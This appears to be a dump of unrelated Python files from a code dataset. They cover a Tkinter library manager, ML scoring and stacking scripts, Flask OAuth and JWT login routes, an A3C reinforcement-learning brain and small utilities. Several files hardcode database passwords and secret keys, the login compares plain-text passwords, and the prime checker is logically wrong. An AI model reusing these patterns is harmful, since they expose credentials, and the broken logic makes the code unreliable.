                           'AUTHOR', 'PUBLISHER', 'PRICE', 'CATEGORY', 'SUB_CATEGORY', 'CLASS', 'STREAM']
        self.ib = Toplevel(self.root)
        self.ib.title('Import CSV file')
        self.ib.geometry('800x350+200+30')
        self.ib.config(bg='lightgray')
        ib_title = Label(self.ib, text='Preview of the File:', font=('Goudy old style', 16, 'bold'), bg='#EBF5FB',
                         fg='#088da5').place(x=10, y=10)
        ib_frame2_sub = Frame(self.ib, bd=4, relief=RIDGE, bg='white')
        ib_frame2_sub.place(x=10, y=40, width=770, height=250)
        ib_scroll_x = Scrollbar(ib_frame2_sub, orient=HORIZONTAL)
        ib_scroll_y = Scrollbar(ib_frame2_sub, orient=VERTICAL)
        ib_user_table = ttk.Treeview(ib_frame2_sub, columns=ib_user_columns, xscrollcommand=ib_scroll_x.set, yscrollcommand=ib_scroll_y.set)
        ib_scroll_x.pack(side=BOTTOM, fill=X)
        ib_scroll_y.pack(side=RIGHT, fill=Y)
        ib_scroll_x.config(command=ib_user_table.xview)
        ib_scroll_y.config(command=ib_user_table.yview)
        ib_user_table.heading('SN', text='SL NO')
        ib_user_table.heading('BOOK TITLE', text='TITLE OF THE BOOK')
        ib_user_table.heading('BOOK CODE', text='BOOK ID/CODE')
        ib_user_table.heading('TOTAL QTY', text='TOTAL QTY')
        ib_user_table.heading('AVAILABLE QTY', text='AVAILABLE QTY')
        ib_user_table.heading('DESCRIPTION', text='DESCRIPTION')
        ib_user_table.heading('AUTHOR', text='AUTHOR')
        ib_user_table.heading('PUBLISHER', text='PUBLISHER')
        ib_user_table.heading('PRICE', text='PRICE')
        ib_user_table.heading('CATEGORY', text='CATEGORY')
        ib_user_table.heading('SUB_CATEGORY', text='SUB CATEGORY')
        ib_user_table.heading('CLASS', text='CLASS')
        ib_user_table.heading('STREAM', text='STREAM')
        ib_user_table['show'] = 'headings'
        ib_user_table.column('SN', width=50)
        ib_user_table.column('BOOK TITLE', width=150)
        ib_user_table.column('BOOK CODE', width=100)
        ib_user_table.column('TOTAL QTY', width=80)
        ib_user_table.column('AVAILABLE QTY', width=80)
        ib_user_table.column('DESCRIPTION', width=100)
        ib_user_table.column('AUTHOR', width=150)
        ib_user_table.column('PUBLISHER', width=100)
        ib_user_table.column('PRICE', width=100)
        ib_user_table.column('CATEGORY', width=100)
        ib_user_table.column('SUB_CATEGORY', width=100)
        ib_user_table.column('CLASS', width=100)
        ib_user_table.column('STREAM', width=100)
        ib_user_table.pack(fill=BOTH, expand=1)
        btn_ib_frame2_sub2 = Button(self.ib, text='Import', font=('Goudy old style', 12, 'bold'),
                                    bg='#EBF5FB', fg='#088da5', width=8, height=1, command=self.import_to_db).place(x=575, y=300)
        btn2_ib_frame2_sub2 = Button(self.ib, text='Cancel', font=('Goudy old style', 12, 'bold'),
                                     bg='#EBF5FB', fg='#088da5', width=8, height=1, command=self.close_ib).place(x=675, y=300)
        self.rows = []
        book_csv_file = askopenfile(mode ='r', filetypes =[('csv files', ['*.csv'])])
        if book_csv_file is not None:
            with open(book_csv_file.name, 'r') as csv_file:
                csv_reader = csv.reader(csv_file, delimiter=',')
                for row in csv_reader:
                    self.rows.append(row)
                if self.rows[0] != ib_user_columns:
                    messagebox.showerror("Error", "This file can be Imported", parent=self.ib)
                else:
                    for row in self.rows[1:]:
                        ib_user_table.insert('', END, values=row)
                    messagebox.showinfo("Success", "please check the data before Import", parent=self.ib)

    def import_to_db(self):
        """Insert the previewed CSV rows into the `books` table.

        Skips rows whose book_id already exists (warning per duplicate),
        assigns serial numbers continuing from the current row count, and
        reports how many rows were actually added.
        """
        mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
        mycursor = mydb.cursor()
        # Next serial number = current row count + 1.
        mycursor.execute("select COUNT(*) from books")
        for x in mycursor:
            sl_no = x[0]
        sl_no_add = int(int(sl_no) + 1)
        sl_no_addc = sl_no_add
        #for i in range(len(self.rows[1:])):
        for i in range(len(self.rows[1:])):
            mycursor.execute("select * from books where book_id=%s ",(self.rows[1:][i][2]))
            row_db = mycursor.fetchone()
            if row_db!=None:
                messagebox.showerror("Error", f"Entry already exist:\n Book Title - {self.rows[1:][i][1]}\n Book Code - {self.rows[1:][i][2]}", parent=self.ib)
            elif row_db==None:
                row = self.rows[1:][i]
                val = (sl_no_addc,row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9],row[10],row[11],row[12])
                sql = "INSERT INTO books (sl_no, book_title, book_id, total_qty, available_qty, descr, author, publisher, price,category,sub_category,class,stream) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)"
                mycursor.execute(sql, val)
                mydb.commit()
                sl_no_addc = sl_no_addc + 1
            else:
                pass
        #if mycursor.rowcount == 1:
        #messagebox.showinfo("Success", "User saved successfully", parent=self.t)
        # Report how many rows the import actually added.
        mycursor.execute("select COUNT(*) from books")
        for x in mycursor:
            sl_no_new = x[0]
        sl_no_add_new = int(int(sl_no_new) + 1)
        added_books = sl_no_add_new - sl_no_add
        messagebox.showinfo("Success", f"No of Books added successfully: {added_books}", parent=self.ib)
        mycursor.close()
        #self.fetch_user_table()
        mydb.close()
        print(sl_no_add)

    def close_ib(self):
        """Close the CSV import preview window."""
        self.ib.destroy()

    def fetch_user_table(self):
        """Reload the books Treeview from the database (clears it first)."""
        mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
        mycursor = mydb.cursor()
        mycursor.execute("select * from books")
        rows = mycursor.fetchall()
        if len(rows)!=0:
            self.user_table.delete(*self.user_table.get_children())
            for row in rows:
                self.user_table.insert('', END, values=row)
            mydb.commit()
        if len(rows)==0:
            self.user_table.delete(*self.user_table.get_children())
        mycursor.close()
        mydb.close()

    def delete_user_table(self):
        """Delete the currently selected book row (matched by book_id) and refresh."""
        cursor_row = self.user_table.focus()
        contents = self.user_table.item(cursor_row)
        row = contents["values"]
        mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
        mycursor = mydb.cursor()
        # row[2] is the BOOK CODE column of the selected Treeview row.
        mycursor.execute("delete from books where book_id=%s ",(row[2]))
        mydb.commit()
        mycursor.close()
        mydb.close()
        self.fetch_user_table()

    def no_of_books(self):
        """Compute the statistics shown in the dashboard.

        Sets self.total_unique_books (row count), self.total_no_of_books
        (sum of total_qty), self.total_available_books (sum of
        available_qty) and self.total_books_issued (total minus available).
        """
        mydb = pymysql.connect(host='localhost', user='lms_user', password='lms@123',database='lms_2')
        mycursor = mydb.cursor()
        mycursor.execute("select COUNT(*) from books")
        for x in mycursor:
            self.total_unique_books = x[0]
        mycursor.execute("SELECT total_qty FROM books")
        myresult = mycursor.fetchall()
        self.total_no_of_books = 0
        for x in myresult:
            self.total_no_of_books = self.total_no_of_books + x[0]
        mycursor.execute("SELECT available_qty FROM books")
        myresult2 = mycursor.fetchall()
        self.total_available_books = 0
        for x in myresult2:
            self.total_available_books = self.total_available_books + x[0]
        self.total_books_issued = self.total_no_of_books - self.total_available_books
# Script entry point: build the Tk root window and hand it to the page class.
root = Tk()
obj = librarian_page(root)
root.mainloop()
|
18,315 | 35df271c6fbf01ca2ca819306080a05018473127 | """Spearman's Rank Correlation Coefficient"""
import typing
import numpy as np
import scipy
from h2oaicore.metrics import CustomScorer
class Spearman_Correlation(CustomScorer):
    """Custom scorer computing Spearman's rank correlation coefficient."""
    _description = "Spearman's Rank Correlation Coefficient"
    _regression = True
    _maximize = True
    _perfect_score = 1.
    _supports_sample_weight = False
    _display_name = "SpearmanR"

    def score(self,
              actual: np.array,
              predicted: np.array,
              sample_weight: typing.Optional[np.array] = None,
              labels: typing.Optional[np.array] = None) -> float:
        """Return Spearman's rho between actual and predicted values.

        Parameters
        ----------
        actual, predicted : np.array
            Ground-truth and model predictions (same length).
        sample_weight, labels : optional
            Accepted for scorer-API compatibility but ignored
            (_supports_sample_weight is False).
        """
        # Defect fixed: the original fabricated an all-ones sample_weight
        # array and then never used it -- dead code removed.
        return scipy.stats.spearmanr(actual, predicted)[0]
|
18,316 | e81f3758d21f8b84590fec045cab2a627aeec128 | import numpy as np
import pandas as pd
from sklearn.metrics import log_loss
from sklearn.model_selection import StratifiedKFold, train_test_split
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation
from keras.optimizers import SGD
from keras.utils.np_utils import to_categorical
from keras.layers.advanced_activations import PReLU
import os
import model_set
features_location='./features/'
layer1_train_output_location = './layer1_train_output/'
layer1_test_output_location = './layer1_test_output/'
stacking_output_location = '../output/'
data='../input/'
def build_model(input_size):
    """Build a small 3-layer Keras MLP for 22-class classification.

    NOTE(review): this function appears unused -- the training loop below
    obtains its model from model_set.nn_3layer_for_stacking instead;
    confirm before removing. Uses the old Keras 1.x-style `init=` kwarg.
    """
    model = Sequential()
    model.add(Dense(88, input_dim= input_size, init='glorot_uniform', activation='relu'))
    # input_dim on a non-first layer; presumably ignored by Keras -- verify.
    model.add(Dense(44, input_dim= input_size, init='glorot_uniform', activation='tanh'))
    model.add(Dense(22, init='glorot_uniform', activation='softmax'))
    model.compile(loss='categorical_crossentropy', optimizer='Adam')
    return model
# ---------------------------------------------------------------------------
# Level-2 stacking: load the level-1 out-of-fold predictions, train a neural
# net on them with bagged stratified K-fold CV, and write the averaged test
# predictions as a submission CSV.
# NOTE: this file is Python 2 (print statements below).
# ---------------------------------------------------------------------------
# Collect every level-1 model's train-set predictions (.npy files).
stack = []
for file in os.listdir(layer1_train_output_location):
    if file.endswith(".npy"):
        temp = np.load(layer1_train_output_location + file)
        #temp = np.loadtxt(layer1_train_output_location + file, delimiter=',')
        stack.append(temp)
# ...and the matching test-set predictions.
test_stack = []
for file in os.listdir(layer1_test_output_location):
    if file.endswith(".npy"):
        temp = np.load(layer1_test_output_location + file)
        test_stack.append(temp)
# Level-2 feature matrices: all level-1 outputs concatenated column-wise.
train_stacked = np.hstack(stack)
test_stacked = np.hstack(test_stack)
nb_input = train_stacked.shape[1]
del stack, test_stack
number_of_folds = 5
number_of_bagging = 1
# Target labels (class ids 0..21) written earlier by the feature pipeline.
y = pd.read_csv(features_location+'y_train.csv',header=None)
y = y.iloc[:,0]
#y = y['sex-age'][0:10000]
bag_of_predictions = np.zeros((test_stacked.shape[0], 22))
for j in range(number_of_bagging):
#for j in range(1):
    print '------------- bagging round %d ------------' % j
    skf = StratifiedKFold(n_splits= number_of_folds ,shuffle=True)
    y_dummy = to_categorical(y.tolist())
    train_predict_y = np.zeros((len(y), 22))
    test_predict_y = np.zeros((test_stacked.shape[0], 22))
    test_predict_list = []
    for i, (train_idx, val_idx) in enumerate(skf.split(train_stacked,y)):
        print '------------- fold round %d ------------' % i
        #model = build_model(features)
        model=model_set.model_set.nn_3layer_for_stacking(nb_input,22,88,44)
        model.fit(train_stacked[train_idx], y_dummy[train_idx],batch_size=32, epochs=6, verbose=1 ,**{'validation_data': (train_stacked[val_idx], y_dummy[val_idx])})
        # model.fit(train_stacked[train_idx], y_dummy[train_idx],batch_size=32, epochs=14, verbose=1 ,**{'validation_data': (train_stacked[val_idx], y_dummy[val_idx])})
        #model.fit(train_stacked[train_idx], y_dummy[train_idx],batch_size=32, epochs=1, verbose=1 ,**{'validation_data': (train_stacked[val_idx], y_dummy[val_idx])})
        # Out-of-fold predictions fill train_predict_y for the CV score.
        scoring = model.predict_proba(train_stacked[val_idx])
        train_predict_y[val_idx] = scoring
        l_score = log_loss(y[val_idx], scoring)
        print '    Fold %d loss: %f' % (i, l_score)
        # Accumulate the test predictions across folds (averaged below).
        tresult = model.predict_proba(test_stacked)
        test_predict_y = test_predict_y + tresult
    l_score = log_loss(y, train_predict_y)
    print 'Final Fold loss: %f' % (l_score)
    test_predict_y = test_predict_y / number_of_folds
    bag_of_predictions = bag_of_predictions + test_predict_y
# Average over bagging rounds (a single round here).
bag_of_predictions = bag_of_predictions / number_of_bagging
filename = 'fred_predict_v11.csv'
filename=stacking_output_location + filename
# Submission columns: 22 sex-age group labels.
classes_=['1-0','1-1','1-2','1-3','1-4','1-5','1-6','1-7','1-8','1-9','1-10','2-0','2-1','2-2','2-3','2-4','2-5','2-6','2-7','2-8','2-9','2-10']
test = pd.read_csv(data+"deviceid_test.tsv", index_col=0,encoding='utf8', sep='\t',header=None)
output = pd.DataFrame(bag_of_predictions, index = test.index[0:bag_of_predictions.shape[0]], columns=classes_)
output.index.name='DeviceID'
output.to_csv(filename,encoding='utf-8',header=True,index=True)
|
18,317 | 26bf434ff0d9dc8d1f77906cde86b3d96920be20 | def primeNumberchecker(num):
number = int(num)
if number > 1:
for i in range(2,number//2):
if number % i == 0:
print("This is not a Prime Number.")
break
else:
print("This is a Prime number.")
break
else:
print("This is not a Prime number.")
primeNumberchecker(input("Check This Number :")) |
18,318 | 44ba5df48cae566027a5dff86c8ffc2a9fa9c969 | """
This module implements a generic document classification based on
pyConTextNLP markup
"""
from . import utils
from . import schema
"""
def modify_categories(document, category_rules):
for cr in category_rules:
utils.anatomy_recategorize(g,t,cr)
"""
def classify_result(doc_rslts, _schema):
    """
    given results in doc_rslts compare to classification_schema and
    return score.

    Takes a three-tuple of boolean values for
    * Disease State Positive
    * Disease State Certain
    * Disease State Acute

    Thin wrapper: all scoring logic lives in schema.assign_schema.
    """
    return schema.assign_schema(doc_rslts, _schema)
def classify_document_targets(doc,
                              classification_rules,
                              category_rules,
                              severity_rules,
                              _schema,
                              neg_filters=["definite_negated_existence",
                                           "probable_negated_existence"],
                              exclusion_categories=["QUALITY_FEATURE",
                                                    "ARTIFACT"]):
    """
    Look at the targets and their modifiers to get an overall
    classification for the document_markup.

    Returns a dict mapping each target category to a three-tuple
    (schema score, target XML, severity values); for each category only
    the highest-scoring (most positive) target is kept.

    NOTE(review): the mutable default arguments are kept for interface
    compatibility; callers must not mutate them in place.
    """
    rslts = {}
    # Computed below but not currently returned; kept for compatibility.
    qualityInducedUncertainty = False
    # `doc` may be either a pyConTextNLP document or already a graph;
    # the original used a bare `except:` here, which also swallowed
    # KeyboardInterrupt/SystemExit.
    try:
        g = doc.getDocumentGraph()
    except Exception:
        g = doc
    targets = [n[0] for n in g.nodes(data=True)
               if n[1].get("category", "") == 'target']
    if targets:
        for t in targets:
            severity_values = []
            current_rslts = {}
            current_category = t.getCategory()
            if not t.isA(exclusion_categories):
                # iterate across all the classification_rules
                current_rslts = \
                    {rk:utils.generic_classifier(g,
                                                 t,
                                                 classification_rules[rk])
                     for rk in classification_rules}
                for cr in category_rules:
                    utils.anatomy_recategorize(g, t, cr)
                for sv in severity_rules:
                    severity = utils.get_severity(g, t, sv)
                    severity_values.extend(severity)
                current_category = t.categoryString()
                # now need to compare current_rslts to rslts
                # to select most Positive
                docr = classify_result(current_rslts, _schema)
                # BUGFIX: the original read `(-1, '', []]))` -- a mismatched
                # bracket that made this function a SyntaxError.
                trslts = rslts.get(current_category, (-1, '', []))
                if trslts[0] < docr:
                    trslts = (docr, t.getXML(), severity_values)
                rslts[current_category] = trslts
            else:
                if t.isA('QUALITY_FEATURE'):
                    qualityInducedUncertainty = True
                else:
                    # if non-negated artifacts call uncertain
                    if not utils.modifies(g, t, neg_filters):
                        qualityInducedUncertainty = True
    return rslts
|
18,319 | ce4411e56d41156773d666d31a1c1a0f175f0548 | a=[i for i in input().split()]
if a[0]==a[1]:
print("=")
elif a==sorted(a):
print("<")
else:
print(">") |
18,320 | 46d95c52ed50dabb77c98e824d7a6a6b0baca730 | from flask import render_template, url_for, request, redirect, session
from app import app
from app.authhelper import get_signin_url, get_token_from_code, access_token_is_valid
from app.graphapi import get_me
def get_redirect_uri():
    '''
    Return the location to pass to the MS OAuth2 framework

    Builds an absolute https URL for the /get_token route so the identity
    provider can redirect back here after authentication.
    '''
    return url_for('token', _external=True, _scheme='https')
@app.route('/')
def login():
    """Landing page: render the Microsoft OAuth2 sign-in link."""
    redirect_uri = get_redirect_uri()
    sign_in_url = get_signin_url(redirect_uri)
    context = {'sign_in_url': sign_in_url}
    return render_template('login.html', **context)
@app.route('/get_token')
def token():
    """OAuth2 redirect endpoint: exchange the authorization code for a token.

    On success, forwards to the profile page; otherwise back to login.
    """
    # receive the authorization code
    auth_code = request.args.get('code')
    if get_token_from_code(auth_code, get_redirect_uri()):
        return redirect(url_for('profile'))
    else:
        return redirect(url_for('login'))
@app.route('/me')
def profile():
    """Show the signed-in user's profile; bounce to login if the token is invalid."""
    if not access_token_is_valid(get_redirect_uri()):
        return redirect(url_for('login'))
    user = get_me()
    context = {'user': user}
    return render_template('home.html', **context)
|
18,321 | 03b778ac6fe6c81a6aa965fd802e128ed495b6c2 | string = "hello"
string = iter(string)
print(next(string))
|
18,322 | 34f7bca37784bb13b472b3cf87aa796f64b8696b | # -*- coding: utf-8 -*-
"""
执行脚本main.py
描述:
该demo是展示如何计算带约束的两个最大化目标的帕累托前沿
本案例调用q_sorted_new_templet算法模板解决该问题
其中为了方便展示,把目标函数和罚函数均和执行脚本写在同一个文件里,建议分开写在不同的文件中。
"""
import numpy as np
import geatpy as ga
# 注意:不建议把目标函数放在执行脚本内,建议放在另一个文件中
def aimfuc(x):
    """Objective function for the bi-objective demo.

    For the first decision variable x1, returns the two maximisation
    objectives f1 = -x1**2 and f2 = -(x1 - 2)**2, stacked column-wise
    to match Geatpy's objective-matrix layout.
    """
    first_var = x[:, [0]]
    objectives = [-(first_var ** 2), -((first_var - 2) ** 2)]
    return np.hstack(objectives)
def punishing(x, FitnV):
    """Penalty function for the demo's constraint.

    Zeroes the fitness (in place) of every individual whose first
    variable violates x1**2 - 2.5*x1 + 1.5 < 0, and returns the updated
    fitness together with the indices of the infeasible individuals.
    """
    first_var = x[:, [0]]
    violation = first_var ** 2 - 2.5 * first_var + 1.5
    infeasible = np.where(violation < 0)[0]
    FitnV[infeasible] = 0
    return [FitnV, infeasible]
if __name__ == "__main__":
AIM_M = __import__('main') # 获取函数所在文件的地址
PUN_M = __import__('main') # 获取罚函数所在文件的地址
# 变量设置
ranges = np.array([[-10], [10]]) # 生成自变量的范围矩阵
borders = np.array([[1], [1]]) # 生成自变量的边界矩阵(1表示变量的区间是闭区间)
precisions = [1] # 因为变量范围都是闭区间,而且nsga2_templet编程模板采用的是实数编码,因此precisions不起作用,但要设置成大于0的任意值
FieldDR = ga.crtfld(ranges, borders, precisions) # 生成区域描述器
# 调用编程模板
[ObjV, NDSet, NDSetObjV, times] = ga.q_sorted_new_templet(AIM_M, 'aimfuc', PUN_M, 'punishing', FieldDR, 'R', maxormin = -1, MAXGEN = 1000, MAXSIZE = 500, NIND = 50, SUBPOP = 1, GGAP = 1, selectStyle = 'tour', recombinStyle = 'xovdp', recopt = 0.9, pm = 0.6, distribute = True, drawing = 1)
|
18,323 | 7c42e4483702cdd5c5e3d488adacf0408d28d20c | # coding:utf-8
__author__ = 'lyb'
# Date:2018/8/6 11:50
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " \
"Chrome/68.0.3423.2 Safari/537.36"
MONGO_URI = 'ip'
MONGO_DB = 'movie'
MONGO_TABLE = 'maoyanmovie_top100'
PROXY_POOL_URL = 'http://localhost:5555/random'
PROXY = None
|
18,324 | 66846d371c8e56dd7715d5a7413a468f176a5e69 | from flask import Flask, request, jsonify
from flask_restx import Api, Resource, fields
from flask_mysqldb import MySQL
from flask_jwt_extended import (
JWTManager,
create_access_token,
create_refresh_token,
)
import datetime
app = Flask(__name__)
mysql = MySQL()
jwt = JWTManager()
# ganti sesuai data yang cocok
app.config["MYSQL_USER"] = "root"
app.config["MYSQL_PASSWORD"] = ""
app.config["MYSQL_DB"] = "proyek_spk"
app.config["MYSQL_HOST"] = "localhost"
app.config["SECRET_KEY"] = "ldkfjosier36+41+6e4r343544664"
app.config["JWT_SECRET_KEY"] = "364746^^&@%$&@)!+525"
app.config.setdefault("JWT_TOKEN_LOCATION", ("headers",))
# Options for JWTs when the TOKEN_LOCATION is headers
app.config.setdefault("JWT_HEADER_NAME", "Authorization")
app.config.setdefault("JWT_HEADER_TYPE", "Bearer")
mysql.init_app(app)
jwt.init_app(app)
# conn = mysql.connect()
# cursor = conn.cursor()
api = Api(app, version="1.0", description="Api untuk auth")
ns = api.namespace("auth", description="AUTH operation")
login_data = api.model(
"Login",
{
"username": fields.String(required=True),
"password": fields.String(required=True),
},
)
@ns.route("/login")
class LoginRoute(Resource):
    @ns.expect(login_data)
    def post(self):
        """Authenticate a user and return JWT access/refresh tokens.

        Expects a JSON body with `username` and `password`.
        """
        # flask_mysqldb exposes the DB handle as `mysql.connection`
        # (the commented-out sibling below used the same attribute).
        cur = mysql.connection.cursor()
        data_login = request.json
        # Parameterized query: the original concatenated the username
        # straight into the SQL string, which allowed SQL injection.
        cur.execute(
            "SELECT * FROM login WHERE username = %s",
            (str(data_login["username"]),),
        )
        data = cur.fetchone()
        # NOTE(review): passwords are compared in plain text; they should
        # be stored hashed (schema change required).
        if data is not None and data[2] == data_login["password"]:
            # BUGFIX: the original called create_refresh_token for the
            # access token and create_access_token for the refresh token.
            jwt_token_access = create_access_token(
                identity=data_login["username"]
            )
            jwt_token_refresh = create_refresh_token(
                identity=data_login["username"]
            )
            message_object = {
                "status": "berhasil",
                "access_token": jwt_token_access,
                "refresh_token": jwt_token_refresh,
            }
            return jsonify(message_object)
        else:
            return {"status": "gagal"}
# @ns.marshal_with(login_data)
# def get(self):
# #ganti sesuai nama table user
# cur = mysql.connection.cursor()
# cur.execute("SELECT * FROM login")
# data = cur.fetchone()
# print(data)
@ns.route("/logout")
class LogoutRoute(Resource):
def post(self):
return {"status": "Berhasil Logout"}
if __name__ == "__main__":
app.run(debug=True)
|
18,325 | 29b20fc9b55e71a8452a3dce524edea78b7a26c4 | from sqlalchemy import Column, Integer, String, DateTime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Category(Base):
    """A simple lookup table of category names."""

    __tablename__ = 'categories'

    # Surrogate primary key.
    id = Column(Integer, primary_key=True)
    # Human-readable category name (required).
    name = Column(String(30), nullable=False)

    def __init__(self, name):
        # BUGFIX: the original also assigned `self.title = title`, but no
        # `title` local existed, so every instantiation raised NameError.
        self.name = name

    def __repr__(self):
        # BUGFIX: the original body was `pass`, so repr() returned None
        # and raised TypeError; return a conventional debug string.
        return "<Category(id={!r}, name={!r})>".format(self.id, self.name)
|
18,326 | 67fd5113557966b6a85c8d07923a6f7f74acf6e1 | #! /usr/bin/env python
# Set log level to benefit from Scapy warnings
import logging
logging.getLogger("scapy").setLevel(1)
from scapy.all import *
if __name__ == "__main__":
    hosts = raw_input('Hostnames you would like to traceroute sepearated by a comma: ')
    ttl = raw_input("Time To Live: ")
    # BUGFIX: raw_input returns a string; the original passed that string
    # through as maxttl whenever the user typed a value (only the empty-input
    # default of 20 was an int). Convert explicitly.
    ttl = int(ttl) if ttl else 20
    traceroute([x.strip() for x in hosts.split(',')], maxttl=ttl)
18,327 | 4f07f07191bc05beb891291c6f7ad70317da1137 | __all__ = ["block_string_value"]
def block_string_value(raw_string: str) -> str:
    """Produce the value of a block string from its parsed raw value.

    Similar to CoffeeScript's block string, Python's docstring trim or Ruby's
    strip_heredoc.

    This implements the GraphQL spec's BlockStringValue() static algorithm.
    """
    lines = raw_string.splitlines()

    # Find the smallest indentation shared by all lines after the first,
    # skipping lines that are entirely whitespace.
    common_indent = None
    for line in lines[1:]:
        indent = len(line) - len(line.lstrip(" \t"))
        if indent < len(line) and (common_indent is None or indent < common_indent):
            common_indent = indent
            if common_indent == 0:
                break

    # Dedent every line after the first by the common indentation.
    if common_indent:
        lines[1:] = [line[common_indent:] for line in lines[1:]]

    # Drop leading and trailing blank lines.
    while lines and not lines[0].strip():
        del lines[0]
    while lines and not lines[-1].strip():
        del lines[-1]

    return "\n".join(lines)
def leading_whitespace(s):
    """Return the number of leading space/tab characters in ``s``."""
    return len(s) - len(s.lstrip(" \t"))
|
18,328 | f467cf0c505ee8ce549e037038556f9c4c6dc3c1 | # coding:utf-8
import tensorflow as tf
from keras import backend as K
import numpy as np
from config import GAMMA_N, MIN_BATCH, LOSS_V, LOSS_ENTROPY, NUM_STATES, NUM_ACTIONS, NONE_STATE, MODEL_DIR, NUM_WIDTH, NUM_SERIES
from pole_model import create_model
import os
# --各スレッドで走るTensorFlowのDeep Neural Networkのクラスです -------
class LocalBrain:
    """Per-worker-thread TensorFlow/Keras network for A3C.

    Each worker thread owns one LocalBrain; gradients computed locally
    are applied to the shared ParameterServer weights, and the updated
    global weights are pulled back (standard A3C weight sharing).
    """
    def __init__(self, name, parameter_server, config, thread_type):  # keeps the global parameter_server reachable via the built ops
        with tf.name_scope(name):
            self.train_queue = [[], [], [], [], []]  # s, a, r, s', s' terminal mask
            K.set_session(config.sess)
            self.config = config
            self.model = self._build_model()  # decide the neural-network architecture
            self._build_graph(name, parameter_server)  # define the training ops and sync ops
    def _build_model(self):  # define the network architecture with Keras
        model = create_model(self.config.simple)
        model._make_predict_function()	# have to initialize before threading
        return model
    def _build_graph(self, name, parameter_server):  # define, in TensorFlow, how the network weights are trained
        ns = NUM_WIDTH[int(self.config.simple)]
        # Input placeholder: 2-D board in "simple" mode, stacked series otherwise.
        if self.config.simple:
            self.s_t = tf.placeholder(tf.float32, shape=(None, ns, ns))
        else:
            self.s_t = tf.placeholder(tf.float32, shape=(None, ns, ns, NUM_SERIES))
        self.a_t = tf.placeholder(tf.float32, shape=(None, NUM_ACTIONS))
        self.r_t = tf.placeholder(tf.float32, shape=(None, 1)) # not immediate, but discounted n step reward
        p, v = self.model(self.s_t)
        # Define the loss function.
        log_prob = tf.log(tf.reduce_sum(p * self.a_t, axis=1, keep_dims=True) + 1e-10)
        advantage = self.r_t - v
        loss_policy = - log_prob * tf.stop_gradient(advantage)  # stop_gradient treats advantage as a constant
        loss_value = LOSS_V * tf.square(advantage)  # minimize value error
        entropy = LOSS_ENTROPY * tf.reduce_sum(p * tf.log(p + 1e-10), axis=1, keep_dims=True)  # maximize entropy (regularization)
        self.loss_total = tf.reduce_mean(loss_policy + loss_value + entropy)
        # Collect this scope's trainable weight variables.
        self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)  # declare the parameters
        # Op to compute the gradients of the total loss w.r.t. local weights.
        self.grads = tf.gradients(self.loss_total, self.weights_params)
        # Op that applies the local gradients to the ParameterServer weights
        # (zip pairs each gradient with its corresponding global variable).
        self.update_global_weight_params = \
            parameter_server.optimizer.apply_gradients(zip(self.grads, parameter_server.weights_params))
        # Op that copies the ParameterServer weights into this LocalBrain.
        self.pull_global_weight_params = [l_p.assign(g_p)
                                          for l_p, g_p in zip(self.weights_params, parameter_server.weights_params)]
        # Op that copies this LocalBrain's weights into the ParameterServer.
        self.push_local_weight_params = [g_p.assign(l_p)
                                         for g_p, l_p in zip(parameter_server.weights_params, self.weights_params)]
    def pull_parameter_server(self):  # local thread fetches the global weights
        self.config.sess.run(self.pull_global_weight_params)
    def push_parameter_server(self):  # local thread copies its weights to the global server
        self.config.sess.run(self.push_local_weight_params)
    def update_parameter_server(self):  # train/update the ParameterServer weights with this brain's gradients
        if len(self.train_queue[0]) < MIN_BATCH:  # skip the update until enough samples are queued
            return
        s, a, r, s_, s_mask = self.train_queue
        self.train_queue = [[], [], [], [], []]
        s = np.array(s)
        a = np.vstack(a)
        r = np.vstack(r)
        s_ = np.array(s_)
        s_mask = np.vstack(s_mask)
        _, v = self.model.predict(s_)
        # Add the GAMMA^N-discounted bootstrap value v (expected return from
        # step N onward) to the n-step discounted return r.
        r = r + GAMMA_N * v * s_mask  # set v to 0 where s_ is terminal state
        feed_dict = {self.s_t: s, self.a_t: a, self.r_t: r}  # data used for the weight update
        self.config.sess.run(self.update_global_weight_params, feed_dict)  # update the ParameterServer weights
    def predict_p(self, s):  # return the action-probability vector p for state s
        p, v = self.model.predict(s)
        return p
    def train_push(self, s, a, r, s_):
        # Queue one transition; a terminal next-state is replaced by the
        # NONE_STATE placeholder with mask 0 so its value bootstraps to zero.
        self.train_queue[0].append(s)
        self.train_queue[1].append(a)
        self.train_queue[2].append(r)
        if s_ is None:
            self.train_queue[3].append(NONE_STATE[int(self.config.simple)])
            self.train_queue[4].append(0.)
        else:
            self.train_queue[3].append(s_)
            self.train_queue[4].append(1.)
    def load_weight(self):
        # Restore previously saved weights from MODEL_DIR.
        self.model.load_weights(os.path.join(MODEL_DIR, 'model_weights.hdf5'))
    def save(self):
        # Persist the model architecture (JSON) and weights to MODEL_DIR.
        if not os.path.isdir(MODEL_DIR):
            os.makedirs(MODEL_DIR)
        with tf.variable_scope("parameter_server"):
            # NOTE(review): this bare except silently swallows all save
            # failures (including disk errors) -- consider logging instead.
            try:
                json_string = self.model.to_json()
                open(os.path.join(MODEL_DIR, 'model.json'), 'w').write(json_string)
                self.model.save_weights(os.path.join(MODEL_DIR, 'model_weights.hdf5'))
            except:
                pass
|
18,329 | be7c868323c0f2e3d2c4213fdfd4fffb517546ad | # 04_suche_nach_summenformel_auf_wikipedia.py
# Webscraper für Summenformeln aus Wikipedia
import requests, logging, re, os
os.chdir(os.path.dirname(__file__))
logging.basicConfig(level=logging.CRITICAL, format='%(asctime)s - %(levelname)s - %(message)s')
def search_in_string(content):
global attempt
logging.debug('Suche nach Summenformeln...')
search_pattern=re.compile(r'>Summenformel<(.*?)</tr>', re.DOTALL)
results=search_pattern.findall(content)
logging.debug('results: '+str(results))
search_pattern=re.compile(r'>([[A-Za-z]{1,}).*?>(\d*)')
result=search_pattern.findall(str(results))
logging.debug('result: '+str(result))
if len(result) != 0:
summenformel=''
for i in range(len(result)):
logging.debug('Loop vergleich:'+''.join(result[i])+'--->'+''.join(result[i-1]))
if result[i] == result[i-1]:
break
summenformel+=''.join(result[i])
